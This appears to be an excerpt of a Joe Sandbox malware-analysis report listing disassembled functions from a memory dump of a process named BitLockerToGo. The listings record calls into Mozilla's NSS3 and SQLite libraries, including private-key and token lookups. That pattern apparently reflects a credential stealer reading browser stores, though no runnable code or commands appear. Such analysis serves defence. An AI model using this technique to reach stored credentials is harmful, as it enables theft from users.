                                                                                                                                                                                                                                                                                                                                                          • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C635E64
                                                                                                                                                                                                                                                                                                                                                          • invalid, xrefs: 6C635EBE
                                                                                                                                                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C635EC3
                                                                                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C635EDB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 632333372-1982981357
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 25f67b5e23807918eb7149a4f818d3509fd8b0a2ade6335121deff95732cf09d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 54512d5836e25b55c9bbcbba7696b6745592ac0435129d85e47e902009cd8d4e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25f67b5e23807918eb7149a4f818d3509fd8b0a2ade6335121deff95732cf09d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3981B270B056219BEB1A8F55C848BAAB7B0BF41318F18326DD81D5BB51C730E842CBDD
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C61DDF9
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C61DE68
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C61DE97
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C61DEB6
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C61DF78
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1526119172-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c6dd3a194e97004d3f711174ff1bdf01aa9e24b5806d9e8abf20bbd5554cb93a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3da7c03cd2afa5e89ba896529ee1dd11de26f26b2ec586a067b0750263541e18
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6dd3a194e97004d3f711174ff1bdf01aa9e24b5806d9e8abf20bbd5554cb93a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9981B371B083009FD715CF29C884B6A77F1BF85309F14882DE99A8BE51EB31E946CB56
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C5CB999), ref: 6C5CCFF3
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C5CB999), ref: 6C5CD02B
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C5CB999), ref: 6C5CD041
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C5CB999), ref: 6C71972B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 491875419-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a3d255b9dad313f9adad0d426ed4d65f84706c303288bcb6795674fe32328fc0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 307dc101af6dfeae7ea91fdf6266452a9c6fd9b2f3f357b6a11ac666c85badb7
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3d255b9dad313f9adad0d426ed4d65f84706c303288bcb6795674fe32328fc0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68615771A042108BD310CF69CD01BA6B7F5EF95318F2845ADE4499FB82E376E947CBA1
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C6A536F,00000022,?,?,00000000,?), ref: 6C6A4E70
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C6A4F28
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C6A4F8E
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C6A4FAE
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6A4FC8
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%c%s%c$%s=%s$oSjl"
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2709355791-1702272930
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fca9a81ba8523aca14dbc08f4daa21050ff7d0da49dcbc0711d9b0c024476b13
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd93809e97a77ff5e94d76bc536f8dfe66d09dc4e4d69f3e3a7436639b7db898
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fca9a81ba8523aca14dbc08f4daa21050ff7d0da49dcbc0711d9b0c024476b13
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53517E31A041458BEF01CAE9CC507FF7BF5BF46348F18A125E890A7A41DB759C078799
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,6C6EA4A1,?,00000000,?,00000001), ref: 6C6CEF6D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(00000000,?,6C6EA4A1,?,00000000,?,00000001), ref: 6C6CEFE4
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(?,00000000,?,6C6EA4A1,?,00000000,?,00000001), ref: 6C6CEFF1
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,6C6EA4A1,?,00000000,?,6C6EA4A1,?,00000000,?,00000001), ref: 6C6CF00B
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C6EA4A1,?,00000000,?,00000001), ref: 6C6CF027
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: htonlmemcpy$ErrorValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: dtls13
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 242828995-1883198198
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d5296a2db130c967a5db4ecd286b1dbd4e2043d3c937e944fdbccb9070be444
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3e4bce2e3c20e294c0b95e4973ef0b5de3b8f2debd473e4908088b73d889c0ab
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d5296a2db130c967a5db4ecd286b1dbd4e2043d3c937e944fdbccb9070be444
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3311271B01215AFC710DF28CC85B8AB7F4EF49348F258029E8289B751E731E915CBEA
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C64AFBE
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C769500,6C643F91), ref: 6C64AFD2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C64B007
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C696A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C641666,?,6C64B00C,?), ref: 6C696AFB
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C64B02F
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C64B046
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C64B058
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C64B060
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
                                                                                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3627567351-3315324353
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 40e8d7fa4de44c443b7ae22d3f810b1015a3f659f55d2eafa6d452b91399b37b
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5e873ee112b951a4dc370f0a9f1c2204f6de72b4445150247f293101e45effbc
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40e8d7fa4de44c443b7ae22d3f810b1015a3f659f55d2eafa6d452b91399b37b
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A231F4705043009BDB208F28D844BAE77A4AFC6B6EF14C619E9745BBD1E332954AC79E
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C68CD08
                                                                                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C68CE16
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C68D079
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1351604052-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1be790091253a97d5cf3918bff4cd1c0d945195509d99d08573be10b472a8020
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d7ce82f0138b14edb28c91a124e5af43c1ec5c4b0b88c27273069d86fdf69d9d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1be790091253a97d5cf3918bff4cd1c0d945195509d99d08573be10b472a8020
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEC1B2B19012199BDB20CF24CC84BDAB7F4BF49308F1441A9E849A7741E775EE95CFA8
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C6897C1,?,00000000,00000000,?,?,?,00000000,?,6C667F4A,00000000), ref: 6C67DC68
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DD36
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DE2D
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DE43
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DE76
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DF32
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DF5F
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DF78
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C67DFAA
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1886645929-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: da92134fdc762f19a6acc16fe1830e6379bd163caa74643fb603a7b3e1db21c2
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE81B5716066018BFB368A59CC903A972D6DB61348F208C3AD51ACAFD1D779D8C6C63E
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C653C76
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C653C94
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6495B0: TlsGetValue.KERNEL32(00000000,?,6C6600D2,00000000), ref: 6C6495D2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6495B0: EnterCriticalSection.KERNEL32(?,?,?,6C6600D2,00000000), ref: 6C6495E7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6495B0: PR_Unlock.NSS3(?,?,?,?,6C6600D2,00000000), ref: 6C649605
• PORT_NewArena_Util.NSS3(00000800), ref: 6C653CB2
• PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C653CCA
• memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C653CE1
  • Part of subcall function 6C653090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C66AE42), ref: 6C6530AA
  • Part of subcall function 6C653090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6530C7
  • Part of subcall function 6C653090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6530E5
  • Part of subcall function 6C653090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C653116
  • Part of subcall function 6C653090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C65312B
  • Part of subcall function 6C653090: PK11_DestroyObject.NSS3(?,?), ref: 6C653154
  • Part of subcall function 6C653090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65317E
Memory Dump Source
• Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
• String ID:
• API String ID: 3167935723-0
APIs
  • Part of subcall function 6C693440: PK11_GetAllTokens.NSS3 ref: 6C693481
  • Part of subcall function 6C693440: PR_SetError.NSS3(00000000,00000000), ref: 6C6934A3
  • Part of subcall function 6C693440: TlsGetValue.KERNEL32 ref: 6C69352E
  • Part of subcall function 6C693440: EnterCriticalSection.KERNEL32(?), ref: 6C693542
  • Part of subcall function 6C693440: PR_Unlock.NSS3(?), ref: 6C69355B
• TlsGetValue.KERNEL32 ref: 6C693D8B
• EnterCriticalSection.KERNEL32(?), ref: 6C693D9F
• PR_Unlock.NSS3(?), ref: 6C693DCA
• PR_SetError.NSS3(00000000,00000000), ref: 6C693DE2
• PR_SetError.NSS3(FFFFE040,00000000), ref: 6C693E4F
  • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
• TlsGetValue.KERNEL32 ref: 6C693E97
• EnterCriticalSection.KERNEL32(?), ref: 6C693EAB
• PR_Unlock.NSS3(?), ref: 6C693ED6
• PR_SetError.NSS3(00000000,00000000), ref: 6C693EEE
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
Similarity
• API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
• String ID:
• API String ID: 2554137219-0
APIs
• PORT_ZAlloc_Util.NSS3(BD5F5530), ref: 6C642C5D
  • Part of subcall function 6C6A0D30: calloc.MOZGLUE ref: 6C6A0D50
  • Part of subcall function 6C6A0D30: TlsGetValue.KERNEL32 ref: 6C6A0D6D
• CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C642C8D
• SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C642CE0
  • Part of subcall function 6C642E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C642CDA,?,00000000), ref: 6C642E1E
  • Part of subcall function 6C642E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C642E33
  • Part of subcall function 6C642E00: TlsGetValue.KERNEL32 ref: 6C642E4E
  • Part of subcall function 6C642E00: EnterCriticalSection.KERNEL32(?), ref: 6C642E5E
  • Part of subcall function 6C642E00: PL_HashTableLookup.NSS3(?), ref: 6C642E71
  • Part of subcall function 6C642E00: PL_HashTableRemove.NSS3(?), ref: 6C642E84
  • Part of subcall function 6C642E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C642E96
  • Part of subcall function 6C642E00: PR_Unlock.NSS3 ref: 6C642EA9
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C642D23
• CERT_IsCACert.NSS3(00000001,00000000), ref: 6C642D30
• CERT_MakeCANickname.NSS3(00000001), ref: 6C642D3F
• free.MOZGLUE(00000000), ref: 6C642D73
• CERT_DestroyCertificate.NSS3(?), ref: 6C642DB8
• free.MOZGLUE ref: 6C642DC8
  • Part of subcall function 6C643E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C643EC2
  • Part of subcall function 6C643E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C643ED6
  • Part of subcall function 6C643E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C643EEE
  • Part of subcall function 6C643E60: PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C643F02
  • Part of subcall function 6C643E60: PL_FreeArenaPool.NSS3 ref: 6C643F14
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C643E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C643F27
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3941837925-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4262d891229c22960c23bc0b762f421707bab2ab75d2be4f4fe95b2bed9abae0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 11c8f15b3677f67ea7d126231057453019f85e82e73025bcff258eda6c9584f9
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4262d891229c22960c23bc0b762f421707bab2ab75d2be4f4fe95b2bed9abae0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1451DE71A042119BEB01DE29DC89B5B77E5EF89348F25C438EC59C3650EB31E8158B9A
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6440D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C643F7F,?,00000055,?,?,6C641666,?,?), ref: 6C6440D9
